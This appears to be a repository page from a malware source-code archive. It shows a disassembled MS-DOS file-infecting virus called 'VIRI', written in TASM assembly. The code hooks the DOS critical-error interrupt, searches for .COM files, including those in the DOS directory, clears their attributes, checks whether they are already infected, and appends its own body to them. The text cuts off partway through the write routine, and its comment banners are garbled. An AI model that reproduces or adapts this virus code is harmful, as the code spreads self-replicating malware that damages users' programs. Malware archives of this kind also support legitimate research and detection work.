MalwareSourceCode/MSDOS/P-Index/Virus.MSDOS.Unknown.pe#1.asm

1 line
4.9 KiB
NASM
Raw Permalink Normal View History

2021-01-12 23:55:26 +00:00
PAGE 59,132 ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ;<3B><> <20><> ;<3B><> VIRI <20><> ;<3B><> <20><> ;<3B><> Created: 7-Jan-92 <20><> ;<3B><> <20><> ;<3B><> Disassembled by -=>Wasp<=- aka >>Night Crawler<< <20><> ;<3B><> Reassemble with TASM 2.0 <20><> ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> DATA_1E EQU 0 DATA_2E EQU 0DH DATA_3E EQU 19H DATA_4E EQU 1CH DATA_5E EQU 3AH DATA_6E EQU 47H SEG_A SEGMENT BYTE PUBLIC ASSUME CS:SEG_A, DS:SEG_A ORG 100h VIRI PROC FAR START: JMP SHORT LOC_2 ; (0151) DB 90H, 2AH, 2EH, 43H, 4FH, 4DH DB 00H, 5CH, 2AH, 2EH, 43H, 4FH DB 4DH, 00H DB '\DOS\*.COM' DB 00H, 00H,0CDH, 20H DB 44 DUP (0) DB 0E9H, 00H, 00H,0B4H, 85H, 00H DB 00H LOC_2: MOV DX,103H CLD ; Clear direction MOV SI,DX ADD SI,19H MOV DI,OFFSET DS:[100H] MOV CX,3 REP MOVSB ; Rep when cx >0 Mov [si] to es:[di] MOV SI,DX MOV AX,3524H INT 21H ; DOS Services ah=function 35h ; get intrpt vector al in es:bx PUSH ES PUSH BX MOV AX,2524H ;* MOV DX,OFFSET LOC_1 ;* DB 0BAH,0B6H, 00H ADD DX,SI INT 21H ; DOS Services ah=function 25h ; set intrpt vector al to ds:dx PUSH DS POP ES PUSH ES MOV AH,2FH ; '/' INT 21H ; DOS Services ah=function 2Fh ; get DTA ptr into es:bx MOV [SI+4AH],ES MOV [SI+4CH],BX POP ES MOV AH,1AH MOV DX,DATA_4E ADD DX,SI INT 21H ; DOS Services ah=function 1Ah ; set DTA to ds:dx MOV AH,4EH ; 'N' CMP BYTE PTR [SI+18H],10H JA LOC_3 ; Jump if above MOV DX,0 ADD DX,SI JMP SHORT LOC_5 ; (01AF) DB 90H LOC_3: CMP BYTE PTR [SI+18H],20H ; ' ' JA LOC_4 ; Jump if above MOV DX,6 ADD DX,SI JMP SHORT LOC_5 ; (01AF) DB 90H LOC_4: MOV DX,DATA_2E ADD DX,SI LOC_5: MOV CX,23H INT 21H ; DOS Services ah=function 4Eh ; find 1st filenam match @ds:dx JC LOC_6 ; Jump if carry Set JMP SHORT LOC_8 ; (01DE) DB 90H VIRI ENDP ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ; ; External Entry Point ; ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> INT_24H_ENTRY PROC FAR MOV AL,0 IRET ; Interrupt return INT_24H_ENTRY ENDP LOC_6: MOV AX,[SI+4AH] MOV DS,AX MOV DX,[SI+4CH] MOV AH,1AH INT 21H ; DOS Services ah=function 1Ah ; set DTA to ds:dx MOV AX,2524H POP DX POP DS INT 21H ; DOS Services ah=function 25h ; set intrpt vector al to ds:dx PUSH ES POP DS MOV DI,OFFSET START PUSH DI RETN 0FFFFH LOC_7: MOV AH,4FH ; 'O' INT 21H ; DOS Services ah=function 4Fh ; find next filename match JC LOC_6 ; Jump if carry Set LOC_8: MOV AX,[SI+36H] CMP AX,400H JB LOC_7 ; Jump if below CMP AX,0F230H JA LOC_7 ; Jump if above MOV AX,4301H MOV DX,DATA_5E ADD DX,SI MOV CX,0 INT 21H ; DOS Services ah=function 43h ; get/set file attrb, nam@ds:dx MOV DX,DATA_5E ADD DX,SI MOV AX,3D02H INT 21H ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx JC LOC_10 ; Jump if carry Set XCHG AX,BX MOV DX,DATA_3E ADD DX,SI MOV CX,3 MOV AH,3FH ; '?' INT 21H ; DOS Services ah=function 3Fh ; read file, cx=bytes, to ds:dx JC LOC_10 ; Jump if carry Set MOV CL,[SI+1AH] MOV CH,[SI+1BH] MOV AX,[SI+36H] SUB AX,1ADH ADD AX,4BH CMP AX,CX JE LOC_10 ; Jump if equal MOV AX,4202H XOR CX,CX ; Zero register XOR DX,DX ; Zero register INT 21H ; DOS Services ah=function 42h ; move file ptr, cx,dx=offset JC LOC_10 ; Jump if carry Set MOV DI,SI ADD DI,4FH ADD AX,100H MOV [DI],AX SUB AX,103H MOV [SI+48H],AX ADD WORD PTR [SI+48H],4EH INC BYTE PTR [SI+18H] CMP BYTE PTR [SI+18H],30H ; '0' JB LOC_9 ; Jump if below MOV BYTE PTR [SI+18H],0 LOC_9: MOV AH,40H ; '@' MOV DX,DATA_1E ADD DX,SI MOV CX,1ADH INT 21H ; DOS Services ah=func